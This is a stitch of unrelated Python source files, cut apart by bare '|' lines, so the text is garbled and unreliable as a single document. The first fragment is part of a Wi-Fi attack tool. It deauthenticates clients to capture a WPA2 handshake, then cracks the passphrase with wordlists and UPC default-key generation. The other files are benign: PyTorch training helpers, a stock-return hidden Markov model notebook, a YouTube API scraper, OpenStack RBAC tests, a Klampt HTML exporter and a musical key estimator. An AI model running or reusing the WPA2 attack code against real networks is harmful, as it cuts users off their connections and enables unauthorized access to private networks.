# the state is changed to self.State.TERMINATED. State, flags,stats and others can be changed during reading
# the available feedback even if the process exited. But self.State.TERMINATED is assigned here if
# the process exited.
if self.returncode is not None:
self.state = self.State.TERMINATED
def get_personalized_dictionaries(target: WirelessAccessPoint) -> List[TextIO]:
"""
Create and return dictionary personalized by available AP details.
:type target: WirelessAccessPoint
:param target: targeted AP
:rtype: List[TextIO]
:return: list of opened personalized dictionaries
"""
dictionaries = []
if re.match(r'^UPC\d{7}$', target.essid):
t = pipes.Template()
t.prepend('upc_keys {} {}'.format(target.essid, '24'), '.-')
t.append('grep " -> WPA2 phrase for "', '--')
t.append('sed "s/^ -> WPA2 phrase for \S* = \'\(.*\)\'$/\\1/"', '--')
d = t.open('dictionary-pipeline', 'r')
dictionaries.append(d)
return dictionaries
class Wpa2Attacker(object):
"""
Main class providing attack on WPA2 secured network.
"""
def __init__(self, ap, monitoring_interface: WirelessInterface):
"""
:type monitoring_interface: WirelessInterface
:param monitoring_interface: wireless interface for attack
"""
self.ap = ap
self.monitoring_interface = monitoring_interface # type: WirelessInterface
def start(self, force=False):
"""
Start attack on WPA2 secured network.
If targeted network have already been cracked and `force` is False, attack is skipped.
:param force: attack even if network have already been cracked
:raises PassphraseNotInAnyDictionaryError: If passphrase was not in any available dictionary.
"""
if not force and self.ap.is_cracked():
# AP already cracked
logger.info('Known ' + str(self.ap))
return
if not self.ap.wpa_handshake_cap_path:
with WirelessCapturer(interface=self.monitoring_interface,
ap=self.ap) as capturer:
while not self.ap.wpa_handshake_cap_path:
capturer.update()
while not capturer.flags['detected_wpa_handshake']:
time.sleep(2)
capturer.update()
result = capturer.get_capture_result()
if len(result): # if AP was detected by capturer
tmp_ap = capturer.get_capture_result()[0]
if len(tmp_ap.associated_stations) == 0:
logger.info('Network is empty.')
# deauthenticate stations to acquire WPA handshake
for st in tmp_ap.associated_stations:
deauthenticate(self.monitoring_interface, st)
time.sleep(2)
capturer.update()
if capturer.flags['detected_wpa_handshake']:
break
else:
logger.info('Network not detected by capturer yet.')
self.ap.save_wpa_handshake_cap(capturer.wpa_handshake_cap_path)
logger.info('WPA handshake detected.')
# prepare dictionaries
dictionaries = []
dictionaries += get_personalized_dictionaries(target=self.ap) # personalized first
# NOTE: Dictionary 'openwall_all.lst' has been compiled by Solar Designer
# of Openwall Project. http://www.openwall.com/wordlists/ License is attached at 'resources/LICENSE'.
dictionaries.append(pkg_resources.resource_stream(__package__, 'resources/test_dictionary.lst'))
dictionaries.append(pkg_resources.resource_stream(__package__, 'resources/openwall_password.lst'))
for idx, dictionary in enumerate(dictionaries):
try:
with Wpa2Cracker(ap=self.ap, dictionary=dictionary)as cracker:
while not self.ap.is_cracked():
cracker.update()
logger.debug(cracker)
time.sleep(5)
except PassphraseNotInDictionaryError:
logger.info('Passphrase not in dictionary. ({}/{})'.format(idx + 1, len(dictionaries)))
finally:
dictionary.close()
if self.ap.is_cracked():
logger.info('Cracked ' + str(self.ap))
break
else:
# Passphrase was not in any dictionary, otherwise the above loop would break.
logger.error('Passphrase not in any dictionary.')
raise PassphraseNotInAnyDictionaryError()
# AP is now cracked, close the dictionaries
for dictionary in dictionaries:
dictionary.close()
def verify_psk(ap: WirelessAccessPoint, psk: str):
with tempfile.NamedTemporaryFile(mode='w', prefix='dictionary') as dictionary_w:
dictionary_w.write(psk)
dictionary_w.flush()
with open(dictionary_w.name, 'r') as dictionary_r:
with Wpa2Cracker(ap=ap, dictionary=dictionary_r) as cracker:
try:
while not ap.is_cracked():
cracker.update()
logger.debug(cracker)
time.sleep(1)
except PassphraseNotInDictionaryError:
result = False
else:
result = True
logger.info('Verified ' + str(ap))
return result
|
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch_optimizer as optim
import copy
def checkNoneGradient(model):
for name, param in model.named_parameters():
if param.requires_grad and param.grad is None:
print("Warning: detected parameter with no gradient that requires gradient:")
print(param)
print(param.shape)
print(name)
def checkNoneGradient(model):
for name, param in model.named_parameters():
if param.requires_grad and param.grad is None:
print(param)
print(param.shape)
print(name)
def average_gradients(model, c = None, parallel = True):
if parallel:
size = float(dist.get_world_size())
if c is None:
c = size
# size = float(dist.get_world_size())
checkNoneGradient(model)
for param in model.parameters():
if param.requires_grad:
# print(param)
# print(param.shape)
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= c
else:
checkNoneGradient(model)
if c is None:
c = 1
for param in model.parameters():
if param.requires_grad:
param.grad.data /= c
def load_state_dict_tolerant(model, state_dict):
model_dict =model.state_dict()
# 1. filter out unnecessary keys
pretrained_dict = {k: v for k, v in state_dict.items() if
(k in model_dict) and (model_dict[k].shape == state_dict[k].shape)}
# 2. overwrite entries in the existing state dict
model_dict.update(pretrained_dict)
# 3. load the new state dict
model.load_state_dict(model_dict)
def save_checkpoint(filename, epoch, nIter, model, lossTracker, best_state_dict, optimizer, lrScheduler):
checkpoint = {'conf':model.conf.__dict__,
'state_dict': model.state_dict(),
'best_state_dict': best_state_dict,
'epoch':epoch,
'nIter': nIter,
'loss_tracker': lossTracker,
'optimizer_state_dict': optimizer.state_dict(),
'lr_scheduler_state_dict': lrScheduler.state_dict()
}
torch.save(checkpoint, filename)
def initializeCheckpoint(Model,
device,
max_lr,
weight_decay,
nIter,
confDict):
conf = Model.Config()
if confDict is not None:
conf.__dict__ = confDict
model = Model(conf).to(device)
optimizer = optim.AdaBelief(
model.parameters(),
max_lr,
weight_decouple=True,
eps = 1e-12,
weight_decay=weight_decay,
rectify=True)
lrScheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr, nIter, pct_start = 0.2, cycle_momentum=False, final_div_factor = 2, div_factor = 20)
lossTracker = {'train': [], 'val': []}
best_state_dict = copy.deepcopy(model.state_dict())
startEpoch = 0
startIter = 0
return startEpoch, startIter, model, lossTracker, best_state_dict, optimizer, lrScheduler
def load_checkpoint(Model, filename,device, strict=False):
checkpoint = torch.load(filename, map_location=device)
startEpoch = checkpoint['epoch']
startIter = checkpoint['nIter']
conf_dict = checkpoint['conf']
conf = Model.Config()
conf.__dict__ = conf_dict
model = Model(conf = conf).to(device)
optimizer = optim.AdaBelief(
model.parameters(),
2e-4,
weight_decouple=True,
eps = 1e-12,
weight_decay = 1e-4,
rectify=True)
lrScheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, 6e-4, 180000, pct_start = 0.2, cycle_momentum=False, final_div_factor=2, div_factor = 20)
# debugging flag
restartFromTheBest =False
if restartFromTheBest:
if not strict:
load_state_dict_tolerant(model, checkpoint['best_state_dict'])
else:
model.load_state_dict(checkpoint['best_state_dict'])
else:
if not strict:
load_state_dict_tolerant(model, checkpoint['state_dict'])
else:
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict( checkpoint['optimizer_state_dict'])
lrScheduler.load_state_dict( checkpoint['lr_scheduler_state_dict'])
best_state_dict = checkpoint['best_state_dict']
lossTracker = checkpoint['loss_tracker']
return startEpoch, startIter, model, lossTracker, best_state_dict, optimizer, lrScheduler
def computeMetrics(model, x, notes):
with torch.no_grad():
logp = model.log_prob(x, notes)
logp= (logp.sum(-1).mean()).item()
stats = model.computeStatsMIREVAL(x, notes)
length = x.shape[1]
nGT = stats["nGT"]
nEst = stats["nEst"]
nCorrect = stats["nCorrect"]
result = {"logProb": logp, "length": length, "nGT": nGT, "nEst":nEst, "nCorrect":nCorrect}
return result
def doValidation(model, dataset, parallel, device):
resultAll = []
with torch.no_grad():
for idx, batch in enumerate(dataset):
notesBatch = [sample["notes"] for sample in batch]
audioSlices = torch.stack(
[torch.from_numpy(sample["audioSlice"]) for sample in batch], dim = 0) . to(device)
result = computeMetrics(model, audioSlices, notesBatch)
resultAll.append(result)
print(result, "progress:{:0.2f}".format(idx/len(dataset)))
# aggregate the result
logPAgg = sum([e["logProb"] for e in resultAll])
lengthAgg = sum([e["length"]/model.fs for e in resultAll])
nGT = sum([e["nGT"] for e in resultAll])
nEst = sum([e["nEst"] for e in resultAll])
nCorrect= sum([e["nCorrect"] for e in resultAll])
if parallel:
import torch.distributed as dist
result = torch.Tensor([logPAgg, lengthAgg, nGT,nEst, nCorrect]).cuda()
dist.all_reduce(result.data)
logPAgg = float(result[0])
lengthAgg = float(result[1])
nGT = float(result[2])
nEst= float(result[3])
nCorrect= float(result[4])
meanNLLPerSecond = -logPAgg/lengthAgg
precision = nCorrect/nEst
recall = nCorrect/nGT
f1 = 2* precision*recall/(precision+recall)
return {"meanNLL": meanNLLPerSecond, "precision": precision, "recall":recall, "f1": f1}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # s_hidden_markov_model_stocks [<img src="https://www.arpm.co/lab/icons/icon_permalink.png" width=30 height=30 style="display: inline;">](https://www.arpm.co/lab/redirect.php?code=s_hidden_markov_model_stocks&codeLang=Python)
# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=ExerFigHMM).
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from hmmlearn.hmm import GaussianHMM
from arpym.tools import add_logo
# -
# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-parameters)
name = 'CSCO' # name of company to consider
t_first = '2007-09-10' # starting date
t_last = '2012-10-19' # ending date
# ## [Step 0](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step00): Load data
path = '../../../databases/global-databases/equities/db_stocks_SP500/'
df_stocks = pd.read_csv(path + 'db_stocks_sp.csv', skiprows=[0], index_col=0)
df_stocks = df_stocks.set_index(pd.to_datetime(df_stocks.index))
# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step01): Compute the compounded returns
v = df_stocks[name].loc[(df_stocks.index >= t_first) &
(df_stocks.index <= t_last)]
dx = np.diff(np.log(v))
dx[np.isnan(dx)] = 0
# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step02): Fit the hidden Markov model and get the transaction matrix
# +
hmm = GaussianHMM(n_components=2, means_prior=np.zeros((1, 1)),
means_weight=1e10).fit(dx.reshape(-1, 1))
# rearrange the volatility from small to large
sigma2 = hmm.covars_.flatten()
idx = np.argsort(sigma2)
sigma2 = sigma2[idx]
p = hmm.transmat_[np.ix_(idx, idx)] # transaction matrix
# -
# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_hidden_markov_model_stocks-implementation-step03): Compute the hidden status
z_ = hmm.predict(dx.reshape(-1, 1))
z = z_.copy()
z[z_ == 0] = idx[0]
z[z_ == 1] = idx[1]
# ## Plots
# +
plt.style.use('arpm')
panic = dx.copy()
calm = dx.copy()
panic[z == 0] = np.nan
calm[z == 1] = np.nan
fig = plt.figure()
plt.plot(v.index[1:], calm, '.', color=[0.4, 0.4, 0.4])
plt.plot(v.index[1:], panic, '^', color=[1.0, 0.5, 0.0])
plt.legend(['state=calm', 'state=panic'])
plt.ylabel('compound returns')
add_logo(fig)
|
<reponame>aktivkohle/youtube-curation
import sys
from userInteraction import askTheUser
import requests
import config
import dateutil.parser
import dateutil.parser
import datetime
from dateutil.relativedelta import relativedelta
import time
import pprint
import pymysql.cursors
import re
def printUnixTimestampNicely(Tstamp):
return (datetime.datetime.fromtimestamp(Tstamp).strftime("%d %B %Y %I:%M:%S %p"))
logfileName = datetime.datetime.now().strftime("%d%B%Y%I:%M:%S%p") + '_Logfile.txt'
f = open("./logfiles/" + logfileName, 'w')
def printDateNicely(timestamp):
reg_format_date = timestamp.strftime("%d %B %Y %I:%M:%S %p")
print(reg_format_date)
def wr(message, p, fi): # to write to log file
fi.write(str(message))
fi.write('\n')
q = dict(p)
q['key'] = 'googleAPIkey'
pprint.pprint(q, fi)
fi.write('\n')
def zed(ts):
dotOooz = re.compile(".*[.]\d{3}Z$")
if (dotOooz.match(ts) != None):
return ts
ending = ts[-1:]
if ending == 'Z':
return ts[:-1] + '.000Z'
else:
return ts + '.000Z'
def storeMeInSQL(element, qq, SQLconnection, openlogfileHandle):
global counter
queriedAt = printUnixTimestampNicely(time.time())
kind = element['kind']
etag = element['etag']
regionCode = element['regionCode']
# Although query_q has scope outside this function, it is safer to actually pass it in as an
# argument, as it is very important, one day this function might not be in this program anymore
# and that saves us from running into a problem.
# In fact to make it even safer, I have renamed query_q to qq!
for thing in list(element['items']):
videoTitle = thing['snippet']['title']
channelTitle = thing['snippet']['channelTitle']
videoId = thing['id']['videoId']
description = thing['snippet']['description']
pa = thing['snippet']['publishedAt']
e = dateutil.parser.parse(pa).replace(tzinfo=None)
publishedAt = e.strftime('%Y-%m-%d %H:%M:%S')
items_etag = thing['etag']
channelId = thing['snippet']['channelId']
with SQLconnection.cursor() as c1: # CPU times: user 0 ns, sys: 0 ns, total: 0 ns
sql1 = "SELECT DISTINCT(videoId) FROM search_api" # Wall time: 14.3 µs
c1.execute(sql1) # (Not Expensive)
videoIdsDicts = c1.fetchall()
videoIds = [d.get('videoId') for d in videoIdsDicts]
if videoId not in videoIds:
with SQLconnection.cursor() as c2:
sql2 = "INSERT INTO search_api (videoTitle, channelTitle, videoId, description, publishedAt, queriedAt, kind, etag, regionCode, items_etag, channelId, query_q) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
c2.execute(sql2, (videoTitle, channelTitle, videoId, description, publishedAt, queriedAt, kind, etag, regionCode, items_etag, channelId, qq))
SQLconnection.commit()
counter += 1
# caution! 'counter' is here a global variable. Maybe safer if it went as an
# argument into the function but not so serious.
# Anyway, the logic of incrementing it in the three places where this function is called
# was wrong, now it is only incremented in one place, after the commit statement.
else:
openlogfileHandle.write("Avoided saving a duplicate into SQL!" + " - " + videoId)
openlogfileHandle.write("\n")
v = askTheUser()
if v == None:
sys.exit()
begin_string = v[0]
end_of_month_string = v[1]
query_q = v[2]
connection = pymysql.connect(host='localhost',
user='root',
password=config.MYSQL_SERVER_PASSWORD,
db='youtubeProjectDB',
charset='utf8mb4', # deals with the exotic emojis
cursorclass=pymysql.cursors.DictCursor)
print ("\n\n")
printDateNicely(datetime.datetime.now())
payload = {'key': config.GOOGLE_API_KEY,
'part': 'snippet',
'q': query_q, # 'dog+training'
'order' : 'date', # reverse chronological of creation
'type':'video',
'videoCaption':'closedCaption', # includes captions.
'maxResults':50}
# videoCaption string
# The videoCaption parameter indicates whether the API should filter video search results based on
# whether they have captions. If you specify a value for this parameter,
# you must also set the type parameter's value to video
# Acceptable values are:
# any – Do not filter results based on caption availability.
# closedCaption – Only include videos that have captions.
# none – Only include videos that do not have captions.
# complete documentation here: https://developers.google.com/youtube/v3/docs/search/list
counter = 0
#begin_string = '2017-02-01T00:00:00Z'
end_datetime = dateutil.parser.parse(begin_string).replace(tzinfo=None)
#end_of_month_string = '2017-03-01T00:00:00Z'
end_of_month_datetime = dateutil.parser.parse(end_of_month_string).replace(tzinfo=None)
while end_datetime < end_of_month_datetime:
bs = begin_string # to get it out of the loop
begin_datetime = dateutil.parser.parse(begin_string).replace(tzinfo=None)
end_datetime = begin_datetime + relativedelta(days=1)
end_string = end_datetime.isoformat()
es = end_string # to get it out of the loop
print ("\n")
begin_datetime = end_datetime
begin_string = begin_datetime.isoformat()
print ("begin: ", zed(bs))
print ("end: ", zed(es))
f.write("\n")
f.write("begin: " + zed(bs))
f.write("\n")
f.write("end: " + zed(es))
f.write("\n")
payload.update({'publishedAfter' : zed(bs)})
payload.update({'publishedBefore': zed(es)})
wr(1, payload, f)
r = requests.get('https://www.googleapis.com/youtube/v3/search', params=payload)
time.sleep( 1/5 )
statuscode = r.status_code
# We have been retrieving for each day
# ..however where a day contains multiple pages
# it is necessary to have another loop of sorts
# here which retrieves those pages within the one
# day
# more queries for the special case of multiple pages
# within one day
if statuscode == 200:
time.sleep( 1/5 )
objects = r.json()
if 'nextPageToken' not in list(objects):
print ("NormalLengthDay")
storeMeInSQL(objects, query_q, connection, f)
daycount = 1
elif 'nextPageToken' in list(objects):
storeMeInSQL(objects, query_q, connection, f)
daycount = 1
itemsEmpty = 0
while 'nextPageToken' in list(objects):
NPT = objects['nextPageToken']
payload.update({'pageToken': NPT})
time.sleep( 1/5 )
wr(2, payload, f)
r = requests.get('https://www.googleapis.com/youtube/v3/search', params=payload)
time.sleep( 1/5 )
statuscode = r.status_code
if statuscode == 200:
time.sleep( 1/5 )
objects = r.json()
storeMeInSQL(objects, query_q, connection, f)
daycount += 1
else:
print (bs, statuscode)
time.sleep( 1/5 )
wr(3, payload, f)
if len(objects['items']) == 0:
itemsEmpty += 1
if itemsEmpty > 3:
break
payload.pop('pageToken')
# important! - now that this section is finished clean out that key from the dictionary!!!
wr(4, payload, f)
print(daycount, " pages of results today.")
f.write(str(daycount) + " pages of results today.")
wr(5, payload, f)
else:
print ("statuscode : ", statuscode)
time.sleep( 1/5 )
print ('\n')
printDateNicely(datetime.datetime.now())
print (counter, " SQL-store operations in total.")
f.close()
connection.close()
|
# Copyright 2017 AT&T Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import utils
from tempest import config
from tempest.lib import decorators
from patrole_tempest_plugin import rbac_rule_validation
from patrole_tempest_plugin.tests.api.compute import rbac_base
CONF = config.CONF
if CONF.policy_feature_enabled.changed_nova_policies_ussuri:
_HYPERVISOR_LIST = "os_compute_api:os-hypervisors:list"
_HYPERVISOR_SHOW = "os_compute_api:os-hypervisors:show"
_HYPERVISOR_LIST_DETAIL = "os_compute_api:os-hypervisors:list-detail"
_HYPERVISOR_STATISTICS = "os_compute_api:os-hypervisors:statistics"
_HYPERVISOR_UPTIME = "os_compute_api:os-hypervisors:uptime"
_HYPERVISOR_SEARCH = "os_compute_api:os-hypervisors:search"
_HYPERVISOR_SERVER = "os_compute_api:os-hypervisors:servers"
else:
_HYPERVISOR_LIST = "os_compute_api:os-hypervisors"
_HYPERVISOR_SHOW = "os_compute_api:os-hypervisors"
_HYPERVISOR_LIST_DETAIL = "os_compute_api:os-hypervisors"
_HYPERVISOR_STATISTICS = "os_compute_api:os-hypervisors"
_HYPERVISOR_UPTIME = "os_compute_api:os-hypervisors"
_HYPERVISOR_SEARCH = "os_compute_api:os-hypervisors"
_HYPERVISOR_SERVER = "os_compute_api:os-hypervisors"
class HypervisorRbacTest(rbac_base.BaseV2ComputeRbacTest):
@classmethod
def skip_checks(cls):
super(HypervisorRbacTest, cls).skip_checks()
if not utils.is_extension_enabled('os-hypervisors', 'compute'):
msg = "%s skipped as os-hypervisors extension not enabled." \
% cls.__name__
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(HypervisorRbacTest, cls).resource_setup()
cls.hypervisor =\
cls.hypervisor_client.list_hypervisors()['hypervisors'][0]
@decorators.idempotent_id('17bbeb9a-e73e-445f-a771-c794448ef562')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_LIST])
def test_list_hypervisors(self):
with self.override_role():
self.hypervisor_client.list_hypervisors()
@decorators.idempotent_id('36b95c7d-1085-487a-a674-b7c1ca35f520')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_LIST_DETAIL])
def test_list_hypervisors_with_details(self):
with self.override_role():
self.hypervisor_client.list_hypervisors(detail=True)
@decorators.idempotent_id('8a7f6f9e-34a6-4480-8875-bba566c3a581')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_SHOW])
def test_show_hypervisor(self):
with self.override_role():
self.hypervisor_client.show_hypervisor(self.hypervisor['id'])
@decorators.idempotent_id('ca0e465c-6365-4a7f-ae58-6f8ddbca06c2')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_STATISTICS])
def test_show_hypervisor_statistics(self):
with self.override_role():
self.hypervisor_client.show_hypervisor_statistics()
@decorators.idempotent_id('109b37c5-91ba-4da5-b2a2-d7618d84406d')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_UPTIME])
def test_show_hypervisor_uptime(self):
with self.override_role():
self.hypervisor_client.show_hypervisor_uptime(
self.hypervisor['id'])
class HypervisorMaxv252RbacTest(rbac_base.BaseV2ComputeRbacTest):
# These tests will fail with a 404 starting from microversion 2.53:
# See the following links for details:
# https://docs.openstack.org/api-ref/compute/#list-hypervisor-servers
# https://docs.openstack.org/api-ref/compute/#search-hypervisor
max_microversion = '2.52'
@classmethod
def skip_checks(cls):
super(HypervisorMaxv252RbacTest, cls).skip_checks()
if not utils.is_extension_enabled('os-hypervisors', 'compute'):
msg = "%s skipped as os-hypervisors extension not enabled." \
% cls.__name__
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(HypervisorMaxv252RbacTest, cls).resource_setup()
cls.hypervisor =\
cls.hypervisor_client.list_hypervisors()['hypervisors'][0]
@decorators.idempotent_id('b86f03cf-2e79-4d88-9eea-62f761591413')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_SERVER])
def test_list_servers_on_hypervisor(self):
with self.override_role():
self.hypervisor_client.list_servers_on_hypervisor(
self.hypervisor['hypervisor_hostname'])
@decorators.idempotent_id('3dbc71c1-8f04-4674-a67c-dcb2fd99b1b4')
@rbac_rule_validation.action(
service="nova",
rules=[_HYPERVISOR_SEARCH])
def test_search_hypervisor(self):
with self.override_role():
self.hypervisor_client.search_hypervisor(
self.hypervisor['hypervisor_hostname'])
|
<filename>Python/python2_version/klampt/io/html.py
from klampt import *
from klampt.model import trajectory
from klampt import robotsim
import json
_title_id = '__TITLE__'
_scene_id = '__SCENE_JSON__'
_path_id = '__PATH_JSON__'
_rpc_id = '__RPC_JSON__'
_compressed_id = '__COMPRESSED__'
_dt_id = '__TIMESTEP__'
def make_fixed_precision(obj,digits):
if isinstance(obj,float):
return round(obj,digits)
elif isinstance(obj,list):
for i in xrange(len(obj)):
obj[i] = make_fixed_precision(obj[i],digits)
elif isinstance(obj,tuple):
return [make_fixed_precision(val,digits) for val in obj]
elif isinstance(obj,dict):
for i,v in obj.iteritems():
obj[i] = make_fixed_precision(v,digits)
return obj
class HTMLSharePath:
"""An exporter that converts animations to shareable HTML files.
Examples::
sharer = HTMLSharePath("mypath.html",name="My spiffy path")
sharer.start(sim) #or world
while [simulation is running]:
#do whatever control you wish to do here
sim.simulate(...)
sharer.animate()
sharer.end() #this saves to the given filename
"""
def __init__(self,filename="path.html",name="Klamp't Three.js app",boilerplate='auto'):
"""
Args:
filename (str): the HTML file to generate
name (str): the title of the HTML page
boilerplate (str): the location of the boilerplate HTML file. If 'auto', it's automatically
found in the ``klampt/data`` folder.
"""
self.name = name
if boilerplate == 'auto':
import pkg_resources
boilerplate = pkg_resources.resource_filename('klampt','data/share_path_boilerplate.html')
f = open(boilerplate,'r')
self.boilerplate_file = ''.join(f.readlines())
f.close()
if any(v not in self.boilerplate_file for v in [_title_id,_scene_id,_path_id,_rpc_id,_compressed_id,_dt_id]):
raise RuntimeError("Boilerplate file does not contain the right tags")
self.fn = filename
self.scene = []
self.transforms = {}
self.rpc = []
self.dt = 0
self.last_t = 0
def start(self,world):
"""Begins the path saving with the given WorldModel or Simulator"""
if isinstance(world,Simulator):
self.sim = world
self.world = world.world
self.last_t = world.getTime()
else:
self.sim = None
self.world = world
self.scene = robotsim.ThreeJSGetScene(self.world)
def animate(self,time=None):
"""Updates the path from the world. If the world wasn't a simulator, the time
argument needs to be provided"""
if self.sim != None and time == None:
time = self.sim.getTime()
self.sim.updateWorld()
dt = time - self.last_t
if self.dt == 0:
self.dt = dt
if self.dt == 0:
return
if abs(dt - self.dt) <= 1e-6:
dt = self.dt
numadd = 0
while dt >= self.dt:
numadd += 1
transforms = json.loads(robotsim.ThreeJSGetTransforms(self.world))
for update in transforms['object']:
n = update['name']
mat = make_fixed_precision(update['matrix'],4)
matpath = self.transforms.setdefault(n,[])
assert len(matpath) == len(self.rpc)
lastmat = None
for m in matpath[::-1]:
if m != None:
lastmat = m
break
if lastmat != mat:
matpath.append(mat)
else:
matpath.append(None)
self.rpc.append('null')
dt -= self.dt
self.last_t += self.dt
if numadd > 1:
print "Uneven time spacing, duplicating frame",numadd,"times"
def end(self):
data = self.boilerplate_file.replace(_title_id,self.name)
data = data.replace(_scene_id,self.scene)
data = data.replace(_path_id,json.dumps(self.transforms))
data = data.replace(_rpc_id,'['+','.join(self.rpc)+']')
data = data.replace(_compressed_id,'true')
data = data.replace(_dt_id,str(self.dt))
print "Path with",len(self.rpc),"frames saved to",self.fn
f = open(self.fn,'w')
f.write(data)
f.close()
if __name__ == '__main__':
import sys
import os
from klampt import trajectory
world = WorldModel()
if len(sys.argv) == 1:
world.readFile("../../data/athlete_plane.xml")
q = world.robot(0).getConfig()
q[2] = 2
world.robot(0).setConfig(q)
sim = Simulator(world)
share = HTMLSharePath(name="Klamp't simulation path")
share.start(sim)
for i in range(100):
sim.simulate(0.02)
share.animate()
share.end()
else:
assert len(sys.argv) == 3,"Usage: sharepath.py world.xml robot_path"
world.readFile(sys.argv[1])
traj = trajectory.RobotTrajectory(world.robot(0))
traj.load(sys.argv[2])
world.robot(0).setConfig(traj.milestones[0])
dt = 0.02
excess = 1.0
share = HTMLSharePath(name="Klamp't path "+os.path.split(sys.argv[2])[1])
share.start(world)
share.dt = dt
t = traj.times[0]
while t < traj.times[-1] + excess:
world.robot(0).setConfig(traj.eval(t))
share.animate(t)
t += dt
share.end()
|
<filename>key_meter_estimation/key_estimation.py
import numpy as np
import partitura
from scipy.stats import mode
from hmm import HMM, ConstantTransitionModel, ObservationModel
from key_profiles import build_key_profile_matrix, KEYS
class KeyProfileObservationModel(ObservationModel):
"""
Use Key Profiles (pitch class distributions) for computing
observation probabilities.
Parameters
----------
key_profile_matrix: {'kp', 'kk' 'cbms'}
Empirical pitch class distributions (see definition
in `key_profiles.py`)
"""
def __init__(self, key_profile_matrix="kp"):
super().__init__()
if isinstance(key_profile_matrix, str):
self.key_profile_matrix = build_key_profile_matrix(
key_profile_matrix
)
elif isinstance(key_profile_matrix, np.ndarray):
assert key_profile_matrix.shape == (24, 12)
self.key_profile_matrix = key_profile_matrix
def __call__(self, observation):
if not self.use_log_probabilities:
p_obs_given_key = np.array(
[
np.prod((kp ** observation) *
(1 - kp) ** (1 - observation))
for kp in self.key_profile_matrix
]
)
return p_obs_given_key
elif self.use_log_probabilities:
log_p_obs_given_key = np.array(
[
np.sum(
(
observation * np.log(kp + 1e-10)
+ np.log1p(-(kp + 1e-10)) * (1 - observation)
)
)
for kp in self.key_profile_matrix
]
)
return log_p_obs_given_key
def compute_transition_probabilities(inertia_param=0.8):
"""
Matrix of transition probabilities
Parameters
----------
intertia_param : float
Parameter between 0 and 1 indicating how likely it is that
we will stay on the same key
Notes
-----
* This is a very naive assumption, but so you should definitely explore
other transition probabilities
"""
modulation_prob = (1 - inertia_param) / 23.0
A = modulation_prob * (np.ones(24) - np.eye(24)) \
+ inertia_param * np.eye(24)
return A
def key_identification(
fn,
key_profiles="kp",
inertia_param=0.8,
piano_roll_resolution=16,
win_size=2,
debug=False,
):
"""
Temperley's Probabilistic Key Identification
Parameters
----------
fn : filename
MIDI file
key_profiles: {"kp", "kk", "cbms"}
Key profiles to use in the KeyProfileObservationModel
(see definition in `key_profiles.py`)
intertia_param: float
Parameter between 0 and 1 indicating how likely it is that
we will stay on the same key
piano_roll_resolution: int
Resolution of the piano roll (i.e., how many cells per second)
win_size: float
Window size in seconds
Returns
-------
key : str
The estimated key of the piece
log_lik:
The log-likelihood of the estimated key
"""
# build observation model
observation_model = KeyProfileObservationModel(
key_profile_matrix=key_profiles
)
# Compute transition model
transition_probabilities = compute_transition_probabilities(
inertia_param=inertia_param
)
transition_model = ConstantTransitionModel(transition_probabilities)
hmm = HMM(
observation_model=observation_model,
transition_model=transition_model
)
# Load score
ppart = partitura.load_performance_midi(fn)
# note_array = ppart.note_array
# Compute piano roll
piano_roll = partitura.utils.compute_pianoroll(
ppart, time_div=piano_roll_resolution
).toarray()
# Number of windows in the piano roll
n_windows = int(
np.ceil(piano_roll.shape[1] / (piano_roll_resolution * win_size))
)
# window size in cells
window_size = win_size * piano_roll_resolution
# Constuct observations (these are non-overlapping windows,
# but you can test other possibilities)
observations = np.zeros((n_windows, 12))
for win in range(n_windows):
idx = slice(win * window_size, (win + 1) * window_size)
segment = piano_roll[:, idx].sum(1)
dist = np.zeros(12)
pitch_idxs = np.where(segment != 0)[0]
for pix in pitch_idxs:
dist[pix % 12] += segment[pix]
# Normalize pitch class distribution
if dist.sum() > 0:
# avoid NaN for empty segments
dist /= dist.sum()
observations[win] = dist
# Compute the sequence
path, log_lik = hmm.find_best_sequence(observations)
key_idx = int(mode(path).mode[0])
key = KEYS[key_idx]
return key, log_lik
def wtc_num_to_key(i):
mode_idx = np.mod(np.mod(i, 48) // 2, 2)
if mode_idx == 0:
wtc_key = KEYS[np.mod(i, 48) // 4]
else:
wtc_key = KEYS[np.mod(i, 48) // 4 + 12]
return wtc_key
|
<reponame>geijt/python-plugwise<filename>plugwise/nodes/__init__.py
"""Plugwise nodes."""
from datetime import datetime
import logging
from ..constants import (
FEATURE_AVAILABLE,
FEATURE_PING,
FEATURE_RELAY,
FEATURE_RSSI_IN,
FEATURE_RSSI_OUT,
PRIORITY_LOW,
UTF8_DECODE,
)
